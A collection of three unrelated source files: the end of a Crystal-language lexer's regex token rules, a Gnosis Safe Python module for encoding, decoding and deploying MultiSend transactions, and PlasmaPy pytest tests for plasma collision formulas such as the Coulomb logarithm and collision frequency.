(r'(?:([a-zA-Z_]\w*)(\.))?'
r'([a-zA-Z_]\w*[!?]?|\*\*?|[-+]@?|'
r'[/%&|^`~]|\[\]=?|<<|>>|<=?>|>=?|===?)',
bygroups(Name.Class, Operator, Name.Function), '#pop'),
default('#pop')
],
'classname': [
(r'[A-Z_]\w*', Name.Class),
(r'(\()(\s*)([A-Z_]\w*)(\s*)(\))',
bygroups(Punctuation, Text, Name.Class, Text, Punctuation)),
default('#pop')
],
'in-intp': [
(r'\{', String.Interpol, '#push'),
(r'\}', String.Interpol, '#pop'),
include('root'),
],
'string-intp': [
(r'#\{', String.Interpol, 'in-intp'),
],
'string-escaped': [
(r'\\([\\befnstv#"\']|x[a-fA-F0-9]{1,2}|[0-7]{1,3})', String.Escape)
],
'string-intp-escaped': [
include('string-intp'),
include('string-escaped'),
],
'interpolated-regex': [
include('string-intp'),
(r'[\\#]', String.Regex),
(r'[^\\#]+', String.Regex),
],
'interpolated-string': [
include('string-intp'),
(r'[\\#]', String.Other),
(r'[^\\#]+', String.Other),
],
'multiline-regex': [
include('string-intp'),
(r'\\\\', String.Regex),
(r'\\/', String.Regex),
(r'[\\#]', String.Regex),
(r'[^\\/#]+', String.Regex),
(r'/[imsx]*', String.Regex, '#pop'),
],
'end-part': [
(r'.+', Comment.Preproc, '#pop')
],
'in-macro-control': [
(r'\{%', String.Interpol, '#push'),
(r'%\}', String.Interpol, '#pop'),
(r'for\b|in\b', Keyword),
include('root'),
],
'in-macro-expr': [
(r'\{\{', String.Interpol, '#push'),
(r'\}\}', String.Interpol, '#pop'),
include('root'),
],
'in-attr': [
(r'\[', Operator, '#push'),
(r'\]', Operator, '#pop'),
include('root'),
],
}
tokens.update(gen_crystalstrings_rules())
|
from enum import Enum
from logging import getLogger
from typing import List, Union
from eth_account.signers.local import LocalAccount
from hexbytes import HexBytes
from web3 import Web3
from gnosis.eth import EthereumClient
from gnosis.eth.contracts import get_multi_send_contract
from gnosis.eth.ethereum_client import EthereumTxSent
from gnosis.eth.typing import EthereumData
logger = getLogger(__name__)
class MultiSendOperation(Enum):
CALL = 0
DELEGATE_CALL = 1
class MultiSendTx:
def __init__(self, operation: MultiSendOperation, to: str, value: int, data: EthereumData):
self.operation = operation
self.to = to
self.value = value
self.data = HexBytes(data) if data else b''
def __eq__(self, other):
if not isinstance(other, MultiSendTx):
return NotImplemented
return (self.operation == other.operation and self.to == other.to
and self.value == other.value and self.data == other.data)
def __len__(self):
"""
:return: Size on bytes of the tx
"""
return 21 + 32 * 2 + self.data_length
def __str__(self):
data = self.data[:4].hex() + ('...' if len(self.data) > 4 else '')
return f'MultisendTx operation={self.operation.name} to={self.to} value={self.value}' \
f' data={data}'
@property
def data_length(self) -> int:
return len(self.data)
@property
def encoded_data(self):
operation = HexBytes('{:0>2x}'.format(self.operation.value)) # Operation 1 byte
to = HexBytes('{:0>40x}'.format(int(self.to, 16))) # Address 20 bytes
value = HexBytes('{:0>64x}'.format(self.value)) # Value 32 bytes
data_length = HexBytes('{:0>64x}'.format(self.data_length)) # Data length 32 bytes
return operation + to + value + data_length + self.data
@classmethod
def from_bytes(cls, encoded_multisend_tx: Union[str, bytes]) -> 'MultiSendTx':
"""
Decodes one multisend transaction. If there's more data after `data` it's ignored. Structure:
operation -> MultiSendOperation 1 byte
to -> ethereum address 20 bytes
value -> tx value 32 bytes
data_length -> 32 bytes
data -> `data_length` bytes
:param encoded_multisend_tx: 1 multisend transaction encoded
:return: Tx as a MultisendTx
"""
encoded_multisend_tx = HexBytes(encoded_multisend_tx)
operation = MultiSendOperation(encoded_multisend_tx[0])
to = Web3.toChecksumAddress(encoded_multisend_tx[1:1 + 20])
value = int.from_bytes(encoded_multisend_tx[21:21 + 32], byteorder='big')
data_length = int.from_bytes(encoded_multisend_tx[21 + 32: 21 + 32 * 2], byteorder='big')
data = encoded_multisend_tx[21 + 32 * 2: 21 + 32 * 2 + data_length]
if data_length != len(data):
raise ValueError('Data length is different from len(data)')
return cls(operation, to, value, data)
class MultiSend:
def __init__(self, address: str, ethereum_client: EthereumClient):
assert Web3.isChecksumAddress(address), \
'%s proxy factory address not valid' % address
self.address = address
self.ethereum_client = ethereum_client
self.w3 = ethereum_client.w3
@classmethod
def from_bytes(cls, encoded_multisend_txs: Union[str, bytes]) -> List[MultiSendTx]:
"""
Decodes one or more multisend transactions from `bytes transactions` (Abi decoded)
:param encoded_multisend_txs:
:return: List of MultiSendTxs
"""
if not encoded_multisend_txs:
return []
encoded_multisend_txs = HexBytes(encoded_multisend_txs)
multisend_tx = MultiSendTx.from_bytes(encoded_multisend_txs)
multisend_tx_size = len(multisend_tx)
assert multisend_tx_size > 0, 'Multisend tx cannot be empty' # This should never happen, just in case
remaining_data = encoded_multisend_txs[multisend_tx_size:]
return [multisend_tx] + cls.from_bytes(remaining_data)
@classmethod
def from_transaction_data(cls, multisend_data: Union[str, bytes]) -> List[MultiSendTx]:
"""
Decodes multisend transactions from transaction data (ABI encoded with selector)
:return:
"""
try:
_, data = get_multi_send_contract(Web3()).decode_function_input(multisend_data)
return cls.from_bytes(data['transactions'])
except ValueError:
return []
@staticmethod
def deploy_contract(ethereum_client: EthereumClient, deployer_account: LocalAccount) -> EthereumTxSent:
"""
Deploy proxy factory contract
:param ethereum_client:
:param deployer_account: Ethereum Account
:return: deployed contract address
"""
contract = get_multi_send_contract(ethereum_client.w3)
tx = contract.constructor().buildTransaction({'from': deployer_account.address})
tx_hash = ethereum_client.send_unsigned_transaction(tx, private_key=deployer_account.key)
tx_receipt = ethereum_client.get_transaction_receipt(tx_hash, timeout=120)
assert tx_receipt
assert tx_receipt['status']
contract_address = tx_receipt['contractAddress']
logger.info("Deployed and initialized Proxy Factory Contract=%s by %s", contract_address,
deployer_account.address)
return EthereumTxSent(tx_hash, tx, contract_address)
def get_contract(self):
return get_multi_send_contract(self.ethereum_client.w3, self.address)
def build_tx_data(self, multi_send_txs: List[MultiSendTx]) -> bytes:
"""
Txs don't need to be valid to get through
:param multi_send_txs:
:param sender:
:return:
"""
multisend_contract = self.get_contract()
encoded_multisend_data = b''.join([x.encoded_data for x in multi_send_txs])
return multisend_contract.functions.multiSend(encoded_multisend_data).buildTransaction({'gas': 1,
'gasPrice': 1})['data']
|
import numpy as np
import pytest
from astropy import units as u
from astropy.constants import c
from astropy.tests.helper import assert_quantity_allclose
import plasmapy.particles.exceptions
from plasmapy.formulary.braginskii import Coulomb_logarithm
from plasmapy.formulary.collisions import (
Knudsen_number,
Spitzer_resistivity,
collision_frequency,
coupling_parameter,
fundamental_electron_collision_freq,
fundamental_ion_collision_freq,
impact_parameter,
impact_parameter_perp,
mean_free_path,
mobility,
)
from plasmapy.utils import exceptions
from plasmapy.utils.exceptions import CouplingWarning
from plasmapy.utils.pytest_helpers import assert_can_handle_nparray
class Test_Coulomb_logarithm:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.temperature1 = 10 * 11604 * u.K
self.T_arr = np.array([1, 2]) * u.eV
self.density1 = 1e20 * u.cm ** -3
self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3
self.temperature2 = 1 * 11604 * u.K
self.density2 = 1e23 * u.cm ** -3
self.z_mean = 2.5
self.particles = ("e", "p")
self.gms1 = 3.4014290066940966
self.gms1_negative = -3.4310536971592493
self.gms2 = 3.6349941014645157
self.gms2_negative = -1.379394033464292
self.gms3 = 3.4014290066940966
self.gms3_negative = 2
self.gms3_non_scalar = (2, 2)
self.gms4 = 3.401983996820073
self.gms4_negative = 0.0005230791851781715
self.gms5 = 3.7196690506837693
self.gms5_negative = 0.03126832674323108
self.gms6 = 3.635342040477818
self.gms6_negative = 0.030720859361047514
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
@pytest.mark.parametrize(
"kwargs",
[
{"method": "classical"},
{"method": "GMS-1"},
{"method": "GMS-2", "z_mean": 1.0},
{"method": "GMS-3"},
{"method": "GMS-4"},
{"method": "GMS-5", "z_mean": 1.0},
{"method": "GMS-6", "z_mean": 1.0},
],
)
def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
Coulomb_logarithm, insert_some_nans, insert_all_nans, kwargs
)
def test_unknown_method(self):
"""Test that function will raise ValueError on non-existent method"""
with pytest.raises(ValueError):
Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
method="welcome our new microsoft overlords",
)
def test_handle_invalid_V(self):
"""Test that V default, V = None, and V = np.nan all give the same result"""
with pytest.warns(CouplingWarning):
methodVal_0 = Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
)
methodVal_1 = Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=None,
)
methodVal_2 = Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
)
assert_quantity_allclose(methodVal_0, methodVal_1)
assert_quantity_allclose(methodVal_0, methodVal_2)
def test_handle_zero_V(self):
"""Test that V == 0 returns a PhysicsError"""
with pytest.raises(exceptions.PhysicsError):
Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=0 * u.m / u.s,
)
def test_handle_V_arraysizes(self):
"""Test that different sized V input array gets handled by _boilerplate"""
with pytest.warns(CouplingWarning):
methodVal_0 = Coulomb_logarithm(
self.T_arr[0],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=np.array([np.nan, 3e7]) * u.m / u.s,
)
methodVal_1 = Coulomb_logarithm(
self.T_arr[1],
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=np.array([1e7, np.nan]) * u.m / u.s,
)
methodVal_2 = Coulomb_logarithm(
self.T_arr,
self.n_arr[0],
self.particles,
z_mean=1 * u.dimensionless_unscaled,
V=np.array([np.nan, np.nan]) * u.m / u.s,
)
assert_quantity_allclose(methodVal_0[0], methodVal_2[0])
assert_quantity_allclose(methodVal_1[1], methodVal_2[1])
def test_symmetry(self):
with pytest.warns(CouplingWarning):
lnLambda = Coulomb_logarithm(
self.temperature1, self.density2, self.particles
)
lnLambdaRev = Coulomb_logarithm(
self.temperature1, self.density2, self.particles[::-1]
)
assert lnLambda == lnLambdaRev
def test_Chen_Q_machine(self):
"""
Tests whether Coulomb logarithm gives value consistent with
Chen's Introduction to Plasma Physics and Controlled Fusion
section 5.6.2 Q-machine example.
"""
T = 0.2 * u.eV
T = T.to(u.K, equivalencies=u.temperature_energy())
n = 1e15 * u.m ** -3
# factor of np.log(2) corrects for different definitions of thermal
# velocity. Chen uses v**2 = k * T / m whereas we use
# v ** 2 = 2 * k * T / m
lnLambdaChen = 9.1 + np.log(2)
lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
errStr = (
"Q-machine value of Coulomb logarithm should be "
f"{lnLambdaChen} and not {lnLambda}."
)
assert testTrue, errStr
def test_Chen_lab(self):
"""
Tests whether Coulomb logarithm gives value consistent with
Chen's Introduction to Plasma Physics and Controlled Fusion
section 5.6.2 lab plasma example.
"""
T = 2 * u.eV
T = T.to(u.K, equivalencies=u.temperature_energy())
n = 1e17 * u.m ** -3
# factor of np.log(2) corrects for different definitions of thermal
# velocity. Chen uses v**2 = k * T / m whereas we use
# v ** 2 = 2 * k * T / m
lnLambdaChen = 10.2 + np.log(2)
lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
errStr = (
"Lab plasma value of Coulomb logarithm should be "
f"{lnLambdaChen} and not {lnLambda}."
)
assert testTrue, errStr
def test_Chen_torus(self):
"""
Tests whether Coulomb logarithm gives value consistent with
Chen's Introduction to Plasma Physics and Controlled Fusion
section 5.6.2 torus example.
"""
T = 100 * u.eV
T = T.to(u.K, equivalencies=u.temperature_energy())
n = 1e19 * u.m ** -3
# factor of np.log(2) corrects for different definitions of thermal
# velocity. Chen uses v**2 = k * T / m whereas we use
# v ** 2 = 2 * k * T / m
lnLambdaChen = 13.7 + np.log(2)
lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
errStr = (
"Torus value of Coulomb logarithm should be "
f"{lnLambdaChen} and not {lnLambda}."
)
assert testTrue, errStr
def test_Chen_fusion(self):
"""
Tests whether Coulomb logarithm gives value consistent with
Chen's Introduction to Plasma Physics and Controlled Fusion
section 5.6.2 fusion reactor example.
"""
T = 1e4 * u.eV
T = T.to(u.K, equivalencies=u.temperature_energy())
n = 1e21 * u.m ** -3
# factor of np.log(2) corrects for different definitions of thermal
# velocity. Chen uses v**2 = k * T / m whereas we use
# v ** 2 = 2 * k * T / m
lnLambdaChen = 16 + np.log(2)
with pytest.warns(exceptions.RelativityWarning):
lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
errStr = (
"Fusion reactor value of Coulomb logarithm should be "
f"{lnLambdaChen} and not {lnLambda}."
)
assert testTrue, errStr
def test_Chen_laser(self):
"""
Tests whether Coulomb logarithm gives value consistent with
Chen's Introduction to Plasma Physics and Controlled Fusion
section 5.6.2 laser plasma example.
"""
T = 1e3 * u.eV
T = T.to(u.K, equivalencies=u.temperature_energy())
n = 1e27 * u.m ** -3
# factor of np.log(2) corrects for different definitions of thermal
# velocity. Chen uses v**2 = k * T / m whereas we use
# v ** 2 = 2 * k * T / m
lnLambdaChen = 6.8 + np.log(2)
with pytest.warns(exceptions.RelativityWarning):
lnLambda = Coulomb_logarithm(T, n, ("e", "p"))
testTrue = np.isclose(lnLambda, lnLambdaChen, rtol=1e-1, atol=0.0)
errStr = (
"Laser plasma value of Coulomb logarithm should be "
f"{lnLambdaChen} and not {lnLambda}."
)
assert testTrue, errStr
def test_GMS1(self):
"""
Test for first version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="GMS-1",
)
testTrue = np.isclose(methodVal, self.gms1, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-1 should be "
f"{self.gms1} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS1_negative(self):
"""
Test for first version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks for when
a negative (invalid) Coulomb logarithm is returned.
"""
with pytest.warns(exceptions.CouplingWarning, match="relies on weak coupling"):
Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="GMS-1",
)
def test_GMS2(self):
"""
Test for second version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-2",
)
testTrue = np.isclose(methodVal, self.gms2, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-2 should be "
f"{self.gms2} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS2_negative(self):
"""
Test for second version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks for when
a negative (invalid) Coulomb logarithm is returned.
"""
with pytest.warns(exceptions.CouplingWarning, match="relies on weak coupling"):
methodVal = Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-2",
)
def test_GMS3(self):
"""
Test for third version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-3",
)
testTrue = np.isclose(methodVal, self.gms3, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-3 should be "
f"{self.gms3} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS3_negative(self):
"""
Test for third version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks whether
a positive value is returned whereas the classical Coulomb
logarithm would return a negative value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-3",
)
testTrue = np.isclose(methodVal, self.gms3_negative, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-3 should be "
f"{self.gms3_negative} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS3_non_scalar_density(self):
"""
Test for third version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks whether
passing in a collection of density values returns a
collection of Coulomb logarithm values.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
10 * 1160 * u.K,
(1e23 * u.cm ** -3, 1e20 * u.cm ** -3),
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-3",
)
testTrue = np.isclose(methodVal, self.gms3_non_scalar, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-3 should be "
f"{self.gms3_non_scalar} and not {methodVal}."
)
assert testTrue.all(), errStr
def test_GMS4(self):
"""
Test for fourth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-4",
)
testTrue = np.isclose(methodVal, self.gms4, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-4 should be "
f"{self.gms4} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS4_negative(self):
"""
Test for fourth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks whether
a positive value is returned whereas the classical Coulomb
logarithm would return a negative value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-4",
)
testTrue = np.isclose(methodVal, self.gms4_negative, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-4 should be "
f"{self.gms4_negative} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS5(self):
"""
Test for fifth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-5",
)
testTrue = np.isclose(methodVal, self.gms5, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-5 should be "
f"{self.gms5} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS5_negative(self):
"""
Test for fifth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks whether
a positive value is returned whereas the classical Coulomb
logarithm would return a negative value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-5",
)
testTrue = np.isclose(methodVal, self.gms5_negative, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-5 should be "
f"{self.gms5_negative} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS6(self):
"""
Test for sixth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002).
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature1,
self.density1,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-6",
)
testTrue = np.isclose(methodVal, self.gms6, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-6 should be "
f"{self.gms6} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS6_negative(self):
"""
Test for sixth version of Coulomb logarithm from Gericke,
Murillo, and Schlanges PRE (2002). This checks whether
a positive value is returned whereas the classical Coulomb
logarithm would return a negative value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = Coulomb_logarithm(
self.temperature2,
self.density2,
self.particles,
z_mean=self.z_mean,
V=np.nan * u.m / u.s,
method="GMS-6",
)
testTrue = np.isclose(methodVal, self.gms6_negative, rtol=1e-6, atol=0.0)
errStr = (
f"Coulomb logarithm for GMS-6 should be "
f"{self.gms6_negative} and not {methodVal}."
)
assert testTrue, errStr
def test_GMS2_zmean_error(self):
"""
Tests whether GMS-2 raises z_mean error when a z_mean is not
provided.
"""
with pytest.raises(ValueError):
methodVal = Coulomb_logarithm(
self.temperature2, self.density2, self.particles, method="GMS-2"
)
def test_GMS5_zmean_error(self):
"""
Tests whether GMS-5 raises z_mean error when a z_mean is not
provided.
"""
with pytest.raises(ValueError):
methodVal = Coulomb_logarithm(
self.temperature2, self.density2, self.particles, method="GMS-5"
)
def test_GMS6_zmean_error(self):
"""
Tests whether GMS-6 raises z_mean error when a z_mean is not
provided.
"""
with pytest.raises(ValueError):
methodVal = Coulomb_logarithm(
self.temperature2, self.density2, self.particles, method="GMS-6"
)
def test_relativity_warn(self):
"""Tests whether relativity warning is raised at high velocity."""
with pytest.warns(exceptions.RelativityWarning):
Coulomb_logarithm(1e5 * u.K, 1 * u.m ** -3, ("e", "p"), V=0.9 * c)
def test_relativity_error(self):
"""Tests whether relativity error is raised at light speed."""
with pytest.raises(exceptions.RelativityError):
Coulomb_logarithm(1e5 * u.K, 1 * u.m ** -3, ("e", "p"), V=1.1 * c)
def test_unit_conversion_error(self):
"""
Tests whether unit conversion error is raised when arguments
are given with incorrect units.
"""
with pytest.raises(u.UnitTypeError):
Coulomb_logarithm(
1e5 * u.g, 1 * u.m ** -3, ("e", "p"), V=29979245 * u.m / u.s
)
def test_single_particle_error(self):
"""
Tests whether an error is raised if only a single particle is given.
"""
with pytest.raises(ValueError):
Coulomb_logarithm(1 * u.K, 5 * u.m ** -3, "e")
def test_invalid_particle_error(self):
"""
Tests whether an error is raised when an invalid particle name
is given.
"""
with pytest.raises(plasmapy.particles.exceptions.InvalidParticleError):
Coulomb_logarithm(1 * u.K, 5 * u.m ** -3, ("e", "g"))
n_e = np.array([1e9, 1e9, 1e24]) * u.cm ** -3
T = np.array([1e2, 1e7, 1e8]) * u.K
Lambda = np.array([5.97, 21.66, 6.69])
particles = ("e", "p")
class Test_impact_parameter_perp:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.particles = ("e", "p")
self.V = 1e4 * u.km / u.s
self.True1 = 7.200146594293746e-10
def test_symmetry(self):
result = impact_parameter_perp(self.T, self.particles)
resultRev = impact_parameter_perp(self.T, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
methodVal = impact_parameter_perp(self.T, self.particles, V=np.nan * u.m / u.s)
testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = (
"Distance of closest approach for 90 degree Coulomb "
f"collision, impact_parameter_perp, should be {self.True1} and "
f"not {methodVal}."
)
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 + 1e-15
methodVal = impact_parameter_perp(self.T, self.particles, V=np.nan * u.m / u.s)
testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"impact_parameter_perp value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
impact_parameter_perp, insert_some_nans, insert_all_nans, {}
)
assert np.isclose(
Coulomb_logarithm(1 * u.eV, 5 * u.m ** -3, ("e", "e")),
Coulomb_logarithm(11604.5220 * u.K, 5 * u.m ** -3, ("e", "e")),
)
class Test_impact_parameter:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.T_arr = np.array([1, 2]) * u.eV
self.n_e = 1e17 * u.cm ** -3
self.n_e_arr = np.array([1e17, 2e17]) * u.cm ** -3
self.particles = ("e", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = np.array([7.200146594293746e-10, 2.3507660003984624e-08])
def test_symmetry(self):
result = impact_parameter(self.T, self.n_e, self.particles)
resultRev = impact_parameter(self.T, self.n_e, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
methodVal = impact_parameter(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
bmin, bmax = methodVal
methodVal = bmin.si.value, bmax.si.value
testTrue = np.allclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
errStr = f"Impact parameters should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
methodVal = impact_parameter(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
bmin, bmax = methodVal
methodVal = bmin.si.value, bmax.si.value
testTrue = not np.allclose(methodVal, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Impact parameter value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
def test_bad_method(self):
"""Testing failure when invalid method is passed."""
with pytest.raises(ValueError):
impact_parameter(
self.T,
self.n_e,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="meow",
)
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
@pytest.mark.parametrize(
"kwargs",
[
{"method": "classical"},
{"method": "GMS-1"},
{"method": "GMS-2", "z_mean": 1.0},
{"method": "GMS-3"},
{"method": "GMS-4"},
{"method": "GMS-5", "z_mean": 1.0},
{"method": "GMS-6", "z_mean": 1.0},
],
)
def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
impact_parameter, insert_some_nans, insert_all_nans, kwargs
)
def test_extend_scalar_bmin(self):
"""
Test to verify that if T is scalar and n is vector, bmin will be extended
to the same length as bmax
"""
(bmin, bmax) = impact_parameter(1 * u.eV, self.n_e_arr, self.particles)
assert len(bmin) == len(bmax)
class Test_collision_frequency:
@classmethod
def setup_class(self):
"""initializing parameters for tests """
self.T = 11604 * u.K
self.n = 1e17 * u.cm ** -3
self.particles = ("e", "p")
self.electrons = ("e", "e")
self.protons = ("p", "p")
self.z_mean = 2.5
self.V = 1e4 * u.km / u.s
self.True1 = 1.3468281539854646e12
self.True_electrons = 1904702641552.1638
self.True_protons = 44450104815.91857
self.True_zmean = 1346828153985.4646
def test_symmetry(self):
with pytest.warns(CouplingWarning):
result = collision_frequency(self.T, self.n, self.particles)
resultRev = collision_frequency(self.T, self.n, self.particles[::-1])
assert result == resultRev
def test_known1(self):
"""
Test for known value.
"""
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = collision_frequency(
self.T,
self.n,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
errStr = f"Collision frequency should be {self.True1} and " f"not {methodVal}."
assert testTrue, errStr
def test_fail1(self):
"""
Tests if test_known1() would fail if we slightly adjusted the
value comparison by some quantity close to numerical error.
"""
fail1 = self.True1 * (1 + 1e-15)
with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
methodVal = collision_frequency(
self.T,
self.n,
self.particles,
z_mean=np.nan * u.dimensionless_unscaled,
V=np.nan * u.m / u.s,
method="classical",
)
testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
errStr = (
f"Collision frequency value test gives {methodVal} and "
f"should not be equal to {fail1}."
)
assert testTrue, errStr
@pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
@pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
@pytest.mark.parametrize(
"kwargs",
[
{"particles": ("e", "e")},
{"particles": ("e", "p")},
{"particles": ("p", "p")},
],
)
def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
"""Test for ability to handle numpy array quantities"""
assert_can_handle_nparray(
collision_frequency, insert_some_nans, insert_all_nans, kwargs
)
def test_electrons(self):
"""
Testing collision frequency between electrons.
"""
